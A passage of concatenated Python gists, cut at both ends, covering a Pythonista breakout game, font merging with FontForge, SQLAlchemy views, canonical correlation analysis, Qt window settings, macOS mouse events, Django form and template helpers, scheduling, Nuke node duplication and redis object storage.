no_stroke()
ellipse(*self.rect)
class Block(object):
def __init__(self, x, y, w, mode=1):
self.size = Size(w, 30)
self.rect = Rect(x, y, *self.size)
self.mode = mode
if self.mode > 1:
self.colour = (0.70, 0.70, 0.70)
else:
self.colour = (1,0,0)
top = self.rect.top()
left = self.rect.left()
right = self.rect.right()
bottom = self.rect.bottom()
self.left = Rect(left-5, bottom+5, 5, top-bottom-10)
self.right = Rect(right, bottom+5, 5, top-bottom-10)
self.bottom = Rect(left, bottom, right-left, 5)
self.top = Rect(left, top-5, right-left, 5)
def draw_sides(self):
fill(0,1,0)
rect(*self.left)
rect(*self.right)
rect(*self.top)
rect(*self.bottom)
def draw(self):
stroke_weight(1)
#no_stroke()
fill(*self.colour)
rect(*self.rect)
#self.draw_sides()
def random_level(n=7, t=13):
level = []
for i in range(n):
level.append([])
for j in range(t):
level[i].append(randint(0, 1))
return level
level = [
[[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
[1, 1, 1]],
[[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]],
[[0, 0, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 0, 0, 0, 0, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 0, 0, 0, 0, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 0, 0]],
[[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 0, 1, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1],
[1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1, 0, 1, 1, 0, 0, 1, 1],
[1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]],
[[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 2, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]],
[[1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1],
[2, 2, 2, 0, 0, 2, 2, 2]],
random_level()
]
class Game(Scene):
def setup(self):
self.level = 1
self.field = Field()
self.player = Player()
self.ball = Ball()
self.blocks = []
self.spawn_blocks()
def spawn_blocks(self):
self.solid_blocks = []
if self.level > len(level):
lvl = len(level)-1
else:
lvl = self.level-1
for y in range(len(level[lvl])):
for x in range(len(level[lvl][y])):
w = screen_size.w/len(level[lvl][y])
mode = level[lvl][y][x]
if level[lvl][y][x] == 1:
self.blocks.append(Block(x * w, screen_size.h - (y*30+90),
w, mode))
elif level[lvl][y][x] == 2:
self.solid_blocks.append(Block(x * w, screen_size.h - (y*30+90),
w, mode))
def draw(self):
removed_blocks = set()
text('Lives: {0}'.format(self.player.lives), x=screen_size.w-45, y=screen_size.h-40)
text('Level: {0}'.format(self.level), x=45, y=screen_size.h-45)
self.field.draw()
self.player.draw()
self.player.update()
self.ball.draw()
if self.ball.is_moving:
self.ball.update(self.dt)
self.ball.collide_with_paddle(self.player)
else:
self.ball.rect.center(self.player.rect.center().x, self.player.rect.top()+10)
self.ball.line = (0, 0, 0, 0)
if self.ball.rect.top() < 0:
self.player.lives -= 1
self.ball.is_moving = False
for block in self.blocks:
block.draw()
if self.ball.is_moving:
if self.ball.collide_with_block(block):
removed_blocks.add(block)
play_effect('Hit_3')
for solid_block in self.solid_blocks:
solid_block.draw()
if self.ball.is_moving:
if self.ball.collide_with_block(solid_block):
play_effect('Ding_1')
for removed_block in removed_blocks:
self.blocks.remove(removed_block)
if len(self.blocks) == 0:
self.ball.is_moving = False
self.level += 1
self.spawn_blocks()
if self.level >= len(level):
level[-1] = random_level()
self.spawn_blocks()
if self.player.lives == 0:
main_scene.switch_scene(GameOver())
def touch_began(self, touch):
if not self.ball.is_moving:
self.ball.is_moving = True
class GameOver(Scene):
def setup(self):
self.field = Field()
self.button = Button(Rect(screen_size.w/2-100, screen_size.h/2-50, 200, 100), 'Restart')
self.button.action = self.restart
self.add_layer(self.button)
def restart(self):
main_scene.switch_scene(Game())
def draw(self):
self.field.draw()
self.button.draw()
no_tint()
text('Game Over', x=screen_size.w/2, y=screen_size.h/4*3, font_size=64)
class MultiScene(Scene):
def __init__(self, start_scene):
self.active_scene = start_scene
run(self, PORTRAIT)
def switch_scene(self, new_scene):
self.active_scene = new_scene
self.setup()
def setup(self):
global screen_size
screen_size = self.size
self.active_scene.add_layer = self.add_layer
self.active_scene.size = self.size
self.active_scene.bounds = self.bounds
self.active_scene.setup()
def draw(self):
background(0.00, 0.25, 0.50)
self.active_scene.touches = self.touches
self.active_scene.dt = self.dt
self.active_scene.draw()
def touch_began(self, touch):
self.active_scene.touch_began(touch)
def touch_moved(self, touch):
self.active_scene.touch_moved(touch)
def touch_ended(self, touch):
self.active_scene.touch_ended(touch)
main_scene = MultiScene(Game())
```
#### File: hard-gists/530c20924768ce180923/snippet.py
```python
import fontforge
from datetime import date
# Path to the directory containing Open Sans
opensans_path = "./Open_Sans"
# Path to the directory containing M+
mplus_path = "./mplus"
# Path to the directory where the Koruri fonts will be generated
# Temporary files are also created in the same directory
koruri_path = "./Koruri"
# Font list
# Open Sans file name, M+ file name, Koruri weight
font_list = [
("OpenSans-Light.ttf", "mplus-1p-light.ttf", "Light"),
("OpenSans-Regular.ttf", "mplus-1p-regular.ttf", "Regular"),
("OpenSans-Semibold.ttf", "mplus-1p-medium.ttf", "Semibold"),
("OpenSans-Bold.ttf", "mplus-1p-bold.ttf", "Bold"),
("OpenSans-Extrabold.ttf", "mplus-1p-heavy.ttf", "Extrabold"),
]
def main():
    # Generate the version string from today's date
today = date.today()
version = "Koruri-{0}".format(today.strftime("%Y%m%d"))
for (op, mp, weight) in font_list:
op_path = "{0}/{1}".format(opensans_path, op)
mp_path = "{0}/{1}".format(mplus_path, mp)
ko_path = "{0}/Koruri-{1}.ttf".format(koruri_path, weight)
generate_koruri(op_path, mp_path, ko_path, weight, version)
def koruri_sfnt_names(weight, version):
return (
('English (US)', 'Copyright',
'''\
Koruri: Copylight (c) 2013-2014, lindwurm.
M+ 1p: Copyright (C) 2002-2014, M+ FONTS PROJECT.
Open Sans: Copyright (c) 2010-2011, Google Corporation.'''),
('English (US)', 'Family', 'Koruri {0}'.format(weight)),
('English (US)', 'SubFamily', weight),
('English (US)', 'Fullname', 'Koruri-{0}'.format(weight)),
('English (US)', 'Version', version),
('English (US)', 'PostScriptName', 'Koruri-{0}'.format(weight)),
('English (US)', 'Vendor URL', 'http://koruri.lindwurm.biz'),
('English (US)', 'Preferred Family', 'Koruri'),
('English (US)', 'Preferred Styles', weight),
('Japanese', 'Preferred Family', 'Koruri'),
('Japanese', 'Preferred Styles', weight),
)
def koruri_gasp():
return (
(8, ('antialias',)),
(13, ('antialias', 'symmetric-smoothing')),
(65535, ('gridfit', 'antialias', 'symmetric-smoothing', 'gridfit+smoothing')),
)
def generate_koruri(op_path, mp_path, ko_path, weight, version):
# M+ を開く
font = fontforge.open(mp_path)
# EMの大きさを2048に設定する
font.em = 2048
# Open Sans を開く
opfont = fontforge.open(op_path)
# Open Sans に含まれるグリフを削除する
font.selection.none()
opfont.selection.all()
for glyph in opfont.selection.byGlyphs:
if glyph.glyphname in font:
font.selection.select(("more",), glyph.glyphname)
font.clear()
    # Merge in Open Sans
font.mergeFonts(op_path)
    # Set the font metadata
font.sfnt_names = koruri_sfnt_names(weight, version)
font.os2_vendor = "maud"
    # Configure grid fitting
font.gasp = koruri_gasp()
    # Generate the TTF
font.generate(ko_path, '', ('short-post', 'opentype', 'PfEd-lookups'))
if __name__ == '__main__':
main()
```
#### File: hard-gists/5310037/snippet.py
```python
from operator import attrgetter
from sqlalchemy import Table, event, subquery
from sqlalchemy.ext.compiler import compiles
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.schema import DDLElement
from sqlalchemy.sql.expression import Executable, ClauseElement
from yeepa.common.util import monkey_patch
from yeepa.backend.models import DBSession, metadata, Base, read_only_metadata
# TODO: rework as per the comments on: http://www.sqlalchemy.org/trac/ticket/2690
# REFACT: override __new__ and ensure that the read_only_metadata is used
class ReflectedTable(Table):
"Never create or drop this table type, as it represents something the ORM does not manage. Also ensure that you always use the read_only_metadata for these tables."
# REFACT: would be nice if one wouldn't have to instantiate the views to make them known, but the metaclass magic still baffles me, so I'm staying away from it
# REFACT: would be nice to extract this into it's own module that we could depend on
# REFACT: make this something more akin to the table object or the declarative table, no idea how to do that though. :)
class View(object):
"""Only supports queries that have no parameters.
Use literal_column() to embedd constants as needed."""
name=None
on=None
query=None
_table=None
def __init__(self, name=None, on=None, query=None, table=None):
if name is not None:
self.name = name
if on is not None:
self.on = on
if not isinstance(self.on, tuple):
self.on = (self.on, )
if query is not None:
self.query = query
if table is not None:
self._table = table
self.register_events()
def __repr__(self):
return u"%(class_name)s(name=%(name)r, on=%(on)r, query=%(query)r)" % dict(
class_name=self.__class__.__name__,
name=self.name,
on=self.on,
query=self.query
)
def register_events(self):
for dependency in self._dependencies():
event.listen(
dependency,
'after_create',
self.create_after_all_dependencies
)
event.listen(
dependency,
"before_drop",
self.drop_before_all_dependencies
)
def _dependencies(self):
for dependency in self.on:
if isinstance(dependency, Table):
yield dependency
if hasattr(dependency, '__table__'):
yield dependency.__table__
# TODO: throw
def create_after_all_dependencies(self, *args, **kwargs):
if self.is_missing_any_dependency():
return
CreateView(self.name, self.query)(*args, **kwargs)
if self._table is not None:
self._table.dispatch.after_create(*args, **kwargs)
def drop_before_all_dependencies(self, *args, **kwargs):
if self.is_missing_any_dependency():
return
if self._table is not None:
self._table.dispatch.before_drop(*args, **kwargs)
DropView(self.name)(*args, **kwargs)
def is_missing_any_dependency(self):
dependendent_table_names = map(attrgetter('name'), self._dependencies())
inspector = Inspector.from_engine(DBSession.bind)
return not set(dependendent_table_names).issubset(inspector.get_table_names() + inspector.get_view_names())
@property
def table(self):
if self._table is None:
self._table = ReflectedTable(self.name, read_only_metadata, autoload=True)
return self._table
class CreateView(DDLElement):
def __init__(self, name, query):
self.name = name
self.selectable = query
# REFACT: try making those instance methods
@compiles(CreateView)
def visit_create_view(element, compiler, **kw):
return "\nCREATE VIEW %s\nAS\n\t%s" % (
element.name,
compiler.sql_compiler.process(element.selectable, literal_binds=True)
)
@compiles(CreateView, 'sqlite')
def visit_create_view(element, compiler, **kw):
return "\nCREATE VIEW IF NOT EXISTS %s\nAS\n\t%s" % (
element.name,
compiler.sql_compiler.process(element.selectable, literal_binds=True)
)
class DropView(DDLElement):
def __init__(self, name):
self.name = name
@compiles(DropView)
def visit_drop_view(element, compiler, **kw):
return "\nDROP VIEW %s" % (element.name)
@compiles(DropView, 'sqlite')
def visit_drop_view(element, compiler, **kw):
return "\nDROP VIEW IF EXISTS %s" % (element.name)
```
#### File: hard-gists/5329310/snippet.py
```python
import numpy as np
import scipy as sp
from scipy import linalg as LA
from scipy.spatial import distance as DIST
def cca(X, Y):
'''
    Canonical correlation analysis (CCA)
http://en.wikipedia.org/wiki/Canonical_correlation
'''
n, p = X.shape
n, q = Y.shape
# zero mean
X = X - X.mean(axis=0)
Y = Y - Y.mean(axis=0)
# covariances
S = np.cov(X.T, Y.T, bias=1)
# S = np.corrcoef(X.T, Y.T)
SXX = S[:p,:p]
SYY = S[p:,p:]
SXY = S[:p,p:]
SYX = S[p:,:p]
#
sqx = LA.sqrtm(LA.inv(SXX)) # SXX^(-1/2)
sqy = LA.sqrtm(LA.inv(SYY)) # SYY^(-1/2)
M = np.dot(np.dot(sqx, SXY), sqy.T) # SXX^(-1/2) * SXY * SYY^(-T/2)
A, s, Bh = LA.svd(M, full_matrices=False)
B = Bh.T
U = np.dot(np.dot(A.T, sqx), X.T).T
V = np.dot(np.dot(B.T, sqy), Y.T).T
return s, A, B, U, V
def gaussian_kernel(x, y, var=1.0):
return np.exp(-np.linalg.norm(x - y) ** 2 / (2 * var))
def polynomial_kernel(x, y, c=1.0, d=2.0):
return (np.dot(x, y) + c) ** d
def kcca(X, Y, kernel_x=gaussian_kernel, kernel_y=gaussian_kernel, eta=1.0):
'''
    Kernel canonical correlation analysis (kernel CCA)
http://staff.aist.go.jp/s.akaho/papers/ibis00.pdf
'''
n, p = X.shape
n, q = Y.shape
Kx = DIST.squareform(DIST.pdist(X, kernel_x))
Ky = DIST.squareform(DIST.pdist(Y, kernel_y))
J = np.eye(n) - np.ones((n, n)) / n
M = np.dot(np.dot(Kx.T, J), Ky) / n
L = np.dot(np.dot(Kx.T, J), Kx) / n + eta * Kx
N = np.dot(np.dot(Ky.T, J), Ky) / n + eta * Ky
sqx = LA.sqrtm(LA.inv(L))
sqy = LA.sqrtm(LA.inv(N))
a = np.dot(np.dot(sqx, M), sqy.T)
A, s, Bh = LA.svd(a, full_matrices=False)
B = Bh.T
# U = np.dot(np.dot(A.T, sqx), X).T
# V = np.dot(np.dot(B.T, sqy), Y).T
return s, A, B
def get_data_1():
X = np.array([[2,1],[1,2],[0,0],[-1,-2],[-2,-1]])
Y = np.array([[2,2],[-1,-1],[0,0],[-2,1],[1,-2]])
return X, Y
def get_data_2():
n = 100
theta = (np.random.rand(n) - 0.5) * np.pi
x1 = np.sin(theta)
x2 = np.sin(3 * theta)
X = np.vstack([x1, x2]).T + np.random.randn(n, 2) * .05
y1 = np.exp(theta) * np.cos(2 * theta)
y2 = np.exp(theta) * np.sin(2 * theta)
Y = np.vstack([y1, y2]).T + np.random.randn(n, 2) * .05
return X, Y
def test_cca():
X, Y = get_data_1()
cca(X, Y)
X, Y = get_data_2()
cca(X, Y)
def test_kcca():
X, Y = get_data_1()
kcca(X, Y)
X, Y = get_data_2()
kcca(X, Y)
if __name__ == '__main__':
test_cca()
test_kcca()
```
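For readers comparing the code above with the linked references: the SVD step in `cca` computes the canonical correlations of the whitened cross-covariance matrix. A compact statement of the identity it relies on (under the zero-mean assumption the code enforces) is sketched below.
```latex
% Canonical correlations via SVD of the whitened cross-covariance
M = \Sigma_{XX}^{-1/2}\,\Sigma_{XY}\,\Sigma_{YY}^{-1/2} = A\,\operatorname{diag}(s)\,B^{\top}
U = X\,\Sigma_{XX}^{-1/2}A, \qquad V = Y\,\Sigma_{YY}^{-1/2}B, \qquad \operatorname{corr}(U_i, V_i) = s_i
```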
#### File: hard-gists/5330231/snippet.py
```python
from PySide.QtCore import QSettings
class WindowSettable(object):
'''
Mixin behavior for MainWindow: window attributes persist as Settings
See Qt Application Example, where these are called readSettings() and writeSettings().
Assert that QSettings have been established on app startup:
QCoreApplication.setOrganizationName("Foo")
QCoreApplication.setOrganizationDomain("foo.com")
QCoreApplication.setApplicationName("Bar")
'''
def _readAndApplyWindowAttributeSettings(self):
'''
Read window attributes from settings,
using current attributes as defaults (if settings not exist.)
Called at QMainWindow initialization, before show().
'''
qsettings = QSettings()
qsettings.beginGroup( "mainWindow" )
# No need for toPoint, etc. : PySide converts types
self.restoreGeometry(qsettings.value( "geometry", self.saveGeometry()))
self.restoreState(qsettings.value( "saveState", self.saveState()))
self.move(qsettings.value( "pos", self.pos()))
self.resize(qsettings.value( "size", self.size()))
if qsettings.value( "maximized", self.isMaximized()) :
self.showMaximized()
qsettings.endGroup()
def _writeWindowAttributeSettings(self):
'''
Save window attributes as settings.
Called when window moved, resized, or closed.
'''
qsettings = QSettings()
qsettings.beginGroup( "mainWindow" )
qsettings.setValue( "geometry", self.saveGeometry() )
qsettings.setValue( "saveState", self.saveState() )
qsettings.setValue( "maximized", self.isMaximized() )
if not self.isMaximized() == True :
qsettings.setValue( "pos", self.pos() )
qsettings.setValue( "size", self.size() )
qsettings.endGroup()
```
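A minimal usage sketch for the mixin above. The window class and the organization/application names are hypothetical; the only requirements taken from the snippet are that the QSettings identifiers are set before the mixin's methods run, and that the read/write helpers are called at startup and on close.
```python
# Hypothetical sketch of wiring WindowSettable (defined above) into a window class.
import sys
from PySide.QtCore import QCoreApplication
from PySide.QtGui import QApplication, QMainWindow

class MainWindow(QMainWindow, WindowSettable):
    def __init__(self):
        super(MainWindow, self).__init__()
        # Restore geometry/state saved by a previous run (if any).
        self._readAndApplyWindowAttributeSettings()

    def closeEvent(self, event):
        # Persist geometry/state so the next run can restore it.
        self._writeWindowAttributeSettings()
        super(MainWindow, self).closeEvent(event)

if __name__ == '__main__':
    app = QApplication(sys.argv)
    # Required so QSettings knows where to store the values.
    QCoreApplication.setOrganizationName("Foo")
    QCoreApplication.setOrganizationDomain("foo.com")
    QCoreApplication.setApplicationName("Bar")
    window = MainWindow()
    window.show()
    sys.exit(app.exec_())
```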
#### File: hard-gists/5330566/snippet.py
```python
import sys
import time
from Quartz.CoreGraphics import * # imports all of the top-level symbols in the module
class AppleMouseEvents():
"""
with thanks to:
TonyT http://hints.macworld.com/article.php?story=2008051406323031
example:
m = AppleMouseEvents()
pos = m.currentPos()
m.mousedrag(pos.x,pos.y+float('30'))
"""
def __init__(self):
self.relative = True
def mouseEvent(self,type, posx, posy):
theEvent = CGEventCreateMouseEvent(None, type, (posx,posy), kCGMouseButtonLeft)
CGEventPost(kCGHIDEventTap, theEvent)
def mousemove(self,posx,posy):
self.mouseEvent(kCGEventMouseMoved, posx,posy);
def mouseclickdn(self,posx,posy):
self.mouseEvent(kCGEventLeftMouseDown, posx,posy);
def mouseclickup(self,posx,posy):
self.mouseEvent(kCGEventLeftMouseUp, posx,posy);
def mousedrag(self,posx,posy):
self.mouseEvent(kCGEventLeftMouseDragged, posx,posy);
def mouserclick(self,posx,posy):
self.mouseEvent(kCGEventRightMouseDown, posx,posy);
self.mouseEvent(kCGEventRightMouseUp, posx,posy);
def mousesingleclick(self,posx,posy):
self.mouseclickdn(posx,posy)
self.mouseclickup(posx,posy)
def mousedblclick(self,posx,posy):
self.mousesingleclick(posx,posy)
self.mousesingleclick(posx,posy)
def mousetrplclick(self,posx,posy):
self.mousesingleclick(posx,posy)
self.mousesingleclick(posx,posy)
self.mousesingleclick(posx,posy)
def currentPos(self):
ourEvent = CGEventCreate(None);
return CGEventGetLocation(ourEvent); # Save current mouse position
class AppleKeyboardEvents():
def __init__(self):
self.relative = True
class AppleWindowEvents():
def __init__(self):
self.relative = True
```
#### File: hard-gists/5344084/snippet.py
```python
from functools import partial
from django.views.generic.base import TemplateResponseMixin
from django.views.generic.edit import ProcessFormView, FormMixin
class MultipleFormsMixin(FormMixin):
"""
A mixin that provides a way to show and handle several forms in a
request. Forms are provided in the class attribute *form_classes* which
provides a mapping of form names to form classes. The form name is used
as identifier and automatically put into the context when calling
``get_context_data``.
Providing keyword arguments for the forms uses ``get_form_kwargs`` by
default for every form class. For convenience, adding specific keywords
to an individiual form is also possible by calling the
``get_<form_key>_kwargs``, e.g. for a form class with key *basket_form*,
you would call ``get_basket_form_kwargs``.
It is also easy to get an individual form instance by calling either
``get_form`` with the *key* as argument or the corresponding
``get_basket_form()`` method for convenience. To prevent instantiating
the forms multiple times throughout the request cycle, the form instances
    are cached on the instance. If ``get_form`` is called and the instances
    are not populated yet, all forms are instantiated and cached before
returning the requested form instance.
"""
form_classes = {} # set the form classes as a mapping
# we are caching instatiated forms here to make sure that we can get
# individual instances from forms easier and don't have to worry about
# instantiating them multiple times through out the course of a
# request cycle.
_cached_forms = {}
def get_form_classes(self):
return self.form_classes
def get_forms(self, form_classes):
if self._cached_forms:
return self._cached_forms
self._cached_forms = {}
for key, form_class in form_classes.items():
kwargs = getattr(self, 'get_{0}_kwargs'.format(key),
self.get_form_kwargs)()
self._cached_forms[key] = form_class(**kwargs)
return self._cached_forms
def __getattr__(self, name):
form_key = name.replace('get_', '')
if form_key in self.form_classes:
return partial(self.get_form, form_key)
return super(MultipleFormsMixin, self).__getattr__(name)
def get_form(self, key):
if not self._cached_forms:
self.get_forms(self.form_classes)
return self._cached_forms[key]
def get_context_data(self, **kwargs):
kwargs = super(MultipleFormsMixin, self).get_context_data(**kwargs)
kwargs.update(self._cached_forms)
return kwargs
def forms_valid(self, forms):
return super(MultipleFormsMixin, self).form_valid(forms)
def forms_invalid(self, forms):
return self.render_to_response(self.get_context_data(forms=forms))
class ProcessMultipleFormsView(ProcessFormView):
"""
A mixin that processes multiple forms on POST. Every form must be
valid.
"""
validation_results = {}
def validate_forms(self, forms):
"""
Validate forms against each other in here. This should return a
        dictionary mapping each *form_key* to its validation result.
"""
return {}
def is_form_valid(self, form_key):
"""
Get the validation result for the given *form_key*. This requires the
validation to be run previously.
"""
return self.validation_results.get(form_key)
def check_forms_are_valid(self, forms):
self.validation_results = {}
for form_key, form in forms.items():
self.validation_results[form_key] = form.is_valid()
        # allow for cross-form validation and update the validation results
self.validation_results.update(self.validate_forms(forms))
return all(self.validation_results.values())
def get(self, request, *args, **kwargs):
form_classes = self.get_form_classes()
forms = self.get_forms(form_classes)
return self.render_to_response(self.get_context_data(forms=forms))
def post(self, request, *args, **kwargs):
form_classes = self.get_form_classes()
forms = self.get_forms(form_classes)
if self.check_forms_are_valid(forms):
return self.forms_valid(forms)
else:
return self.forms_invalid(forms)
class BaseMultipleFormsView(MultipleFormsMixin, ProcessMultipleFormsView):
"""
A base view for displaying several forms.
"""
class MultipleFormsView(TemplateResponseMixin, BaseMultipleFormsView):
"""
    A view for displaying several forms and rendering a template response.
"""
```
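A minimal usage sketch, assuming hypothetical `ContactForm`/`NewsletterForm` form classes, a `contact.html` template and a `/thanks/` URL (none of which are part of the gist); it follows the conventions described in the mixin's docstring: the `form_classes` mapping, the per-form `get_<form_key>_kwargs` hook, and overriding `forms_valid`.
```python
# Hypothetical sketch -- form classes, template name and redirect URL are made up.
from django import forms
from django.http import HttpResponseRedirect


class ContactForm(forms.Form):
    email = forms.EmailField()
    message = forms.CharField(widget=forms.Textarea)


class NewsletterForm(forms.Form):
    subscribe = forms.BooleanField(required=False)


class ContactPageView(MultipleFormsView):
    template_name = 'contact.html'
    form_classes = {
        'contact_form': ContactForm,
        'newsletter_form': NewsletterForm,
    }

    def get_newsletter_form_kwargs(self):
        # Picked up by get_forms() via the get_<form_key>_kwargs convention.
        kwargs = self.get_form_kwargs()
        kwargs['prefix'] = 'newsletter'
        return kwargs

    def forms_valid(self, forms):
        # Every form validated (including cross-form checks); act on the data and redirect.
        data = forms['contact_form'].cleaned_data
        print('contact from %s' % data['email'])  # placeholder for real handling
        return HttpResponseRedirect('/thanks/')
```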
#### File: hard-gists/5352608/snippet.py
```python
from apscheduler.scheduler import Scheduler
import datetime as dt
sched = Scheduler()
sched.start()
def timeout(job_fn, *fn_args, **delta_args):
"""Like setTimeout in javascript; returns a job object
First argument is the function to be called.
Positional arguments will be passed to the function when it's called.
    Keyword arguments will be passed to datetime.timedelta
Usage:
# calls `fn()` after 3 seconds
timeout(fn, seconds=3)
# calls `fn(foo, bar)` after 10 seconds
timeout(fn, foor, bar, seconds=10)
"""
time = dt.datetime.now() + dt.timedelta(**delta_args)
return sched.add_date_job(job_fn, time, fn_args)
# Example usage:
def hello_spam(name):
print "Hello {0}".format(name)
timeout(hello_spam, "Dude", seconds=1)
hello_spam("Dude")
import time
time.sleep(15)
```
#### File: hard-gists/5358040/snippet.py
```python
from django import template
register = template.Library()
@register.simple_tag
def format_date_range(date_from, date_to, separator=" - ",
format_str="%B %d, %Y", year_f=", %Y", month_f="%B", date_f=" %d"):
""" Takes a start date, end date, separator and formatting strings and
returns a pretty date range string
"""
if (date_to and date_to != date_from):
from_format = to_format = format_str
if (date_from.year == date_to.year):
from_format = from_format.replace(year_f, '')
if (date_from.month == date_to.month):
to_format = to_format.replace(month_f, '')
return separator.join((date_from.strftime(from_format), date_to.strftime(to_format)))
else:
return date_from.strftime(format_str)
```
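For illustration, a hedged check of the formatting behaviour by calling the underlying function directly (the dates are made up, and calling it this way assumes `register.simple_tag` returns the original function unchanged, as it does in the Django versions I'm aware of; in a template you would `{% load %}` whatever module this file is saved as).
```python
# Hypothetical quick check of the formatting logic; dates are made up.
import datetime

print(format_date_range(datetime.date(2013, 5, 7), datetime.date(2013, 5, 9)))
# same month and year -> the year is dropped on the left and the month on the
# right, giving something like "May 07 -  09, 2013"

print(format_date_range(datetime.date(2013, 5, 7), datetime.date(2014, 1, 2)))
# different years -> both sides keep the full format:
# "May 07, 2013 - January 02, 2014"
```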
#### File: hard-gists/5380169/snippet.py
```python
import random, scene
sizeInPixels = 100
def rectFromPt(inPoint): # returns a scene.Rect centered on inPoint
half = sizeInPixels / 2
return scene.Rect(inPoint.x - half, inPoint.y - half, sizeInPixels, sizeInPixels)
class ImageLayer(scene.Layer):
def __init__(self, inCenter, inImage):
super(self.__class__, self).__init__(rectFromPt(inCenter))
self.image = inImage
class MyScene(scene.Scene):
def __init__(self):
scene.run(self) # a self running scene
def setup(self):
#centerOfScreen = self.bounds.center()
thePoint = scene.Point(10 + sizeInPixels / 2, 10 + sizeInPixels / 2)
images = 'Rabbit_Face Mouse_Face Cat_Face Dog_Face Octopus Bear_Face Chicken Cow_Face'
images = images.split()
for image in images:
scene.load_image(image)
images *= 2 # go from 8 images to 16
random.shuffle(images)
for image in images:
self.add_layer(ImageLayer(thePoint, image))
thePoint.x += 10 + sizeInPixels / 3
thePoint.y = thePoint.x
self.touchedLayer = None
def draw(self):
scene.background(0, 0, 0)
self.root_layer.update(self.dt)
self.root_layer.draw()
def touch_began(self, touch):
if touch.layer != self.root_layer:
self.touchedLayer = touch.layer
def touch_moved(self, touch):
if self.touchedLayer:
self.touchedLayer.frame = rectFromPt(touch.location)
def touch_ended(self, touch):
self.touchedLayer = None
MyScene() # a self running scene
```
#### File: hard-gists/5400853/snippet.py
```python
import nuke
def duplicate_node(node, to_file = None):
"""Slightly convoluted but reliable(?) way duplicate a node, using
the same functionality as the regular copy and paste.
Could almost be done tidily by doing:
for knobname in src_node.knobs():
value = src_node[knobname].toScript()
new_node[knobname].fromScript(value)
    ...but this lacks some subtlety, like handling custom knobs
to_file can be set to a string, and the node will be written to a
file instead of duplicated in the tree
"""
# Store selection
orig_selection = nuke.selectedNodes()
# Select only the target node
[n.setSelected(False) for n in nuke.selectedNodes()]
node.setSelected(True)
# If writing to a file, do that, restore the selection and return
if to_file is not None:
nuke.nodeCopy(to_file)
[n.setSelected(False) for n in orig_selection]
return
# Copy the selected node and clear selection again
nuke.nodeCopy("%clipboard%")
node.setSelected(False)
if to_file is None:
# If not writing to a file, call paste function, and the new node
# becomes the selected
nuke.nodePaste("%clipboard%")
new_node = nuke.selectedNode()
# Restore original selection
[n.setSelected(False) for n in nuke.selectedNodes()] # Deselect all
[n.setSelected(True) for n in orig_selection] # Select originally selected
return new_node
```
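A short usage sketch, assuming it runs in Nuke's script editor with a node named 'Blur1' in the current script; the node name and output path are placeholders, not part of the gist.
```python
# Hypothetical usage inside Nuke's script editor; names and paths are made up.
src = nuke.toNode('Blur1')
copy = duplicate_node(src)                         # paste a duplicate into the graph
copy.setXYpos(src.xpos() + 100, src.ypos())        # nudge it aside
duplicate_node(src, to_file='/tmp/blur1_copy.nk')  # or serialise it to a .nk file instead
```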
#### File: hard-gists/540687/snippet.py
```python
import jsonpickle
import domain
"""
Based on the premise that any object can be identified by its class name and
the value of a unique attribute (primary key), which is here referred to as the identity
"""
def make_attribute_key(obj,attribute):
"""
Returns a key for a given attribute/property of an object
"""
basic_key = _make_basic_key(obj.__class__.__name__, obj.get_identity())
return basic_key + attribute
def exists(db, class_name, identity):
"""
Checks if a specific object exists in the redis store
"""
result_keys = keys(db,class_name, identity)
return True if len(result_keys) else False
def keys(db, class_name, identity):
"""
Returns all keys for a given object
"""
pattern = _make_key_pattern(class_name, identity)
return db.keys(pattern)
def set(db, k, v):
db.set(k,jsonpickle.encode(v))
def get(db,k):
return jsonpickle.decode(db.get(k))
def mset(db, kv_dict):
for k,v in kv_dict.iteritems():
kv_dict[k] = jsonpickle.encode(v)
db.mset(kv_dict)
def mget(db, keys):
return [jsonpickle.decode(each) for each in db.mget(keys)]
def save(db, obj):
mset(db, _make_pairs(obj))
def multisave(db, objs):
"""
Saves multiple objects in one operation using a mset
"""
pairs = {}
for each in objs:
pairs.update(_make_pairs(each))
mset(db, pairs)
def delete(db, obj):
[db.delete(each) for each in keys(db, obj.__class__.__name__, obj.get_identity())]
def read(db, class_name, identity):
obj = getattr(domain, class_name)()
result_keys = keys(db, class_name, identity)
results = mget(db, result_keys)
[setattr(obj, _extract_attribute(k), v) for k,v in zip(result_keys, results)]
return obj
def read_attribute(db, class_name, identity, attrib):
basic_key = _make_basic_key(class_name, identity)
return get(db, basic_key + attrib)
""" Privates for key building"""
def _extract_attribute(key):
return key.split(_sep())[-1]
def _sep():
return '::'
def _make_basic_key(class_name, identity):
return 'qackle' + _sep() + class_name + _sep() + identity + _sep()
def _make_key_pattern(class_name, identity):
return _make_basic_key(class_name, identity) + '*'
""" Privates for object attributes"""
def _get_attributes(obj):
return [each for each in dir(obj) if not each.startswith('_') and not callable(getattr(obj, each))]
def _make_pairs(obj):
"""
    Returns a dict where each key denotes an object property and each value is the value
    of that property
"""
attributes = _get_attributes(obj)
pairs = {}
for each in attributes:
